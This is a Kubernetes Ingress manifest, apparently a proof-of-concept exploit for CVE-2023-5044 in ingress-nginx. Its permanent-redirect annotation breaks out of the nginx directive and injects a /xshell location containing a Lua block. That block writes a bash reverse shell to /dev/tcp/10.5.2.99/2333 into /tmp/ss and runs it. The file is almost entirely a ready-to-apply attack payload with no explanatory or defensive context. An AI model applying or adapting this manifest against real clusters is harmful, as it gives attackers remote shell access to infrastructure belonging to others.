apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: cve-2023-5044
  annotations:
    kubernets.io/ingress.class: nginx
    nginx.ingress.kubernetes.io/permanent-redirect: |
      https://www.nsfocus.com.cn;}
      location /xshell {
      content_by_lua_block {
        os.execute("echo 'bash -i >& /dev/tcp/10.5.2.99/2333 0>&1' > /tmp/ss")
        io.popen("bash /tmp/ss")
      }}
      location /test {
        return 404
spec:
  ingressClassName: nginx
  rules:
  - host: zhangxiaoyong.cn
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: service-1
            port:
              number: 80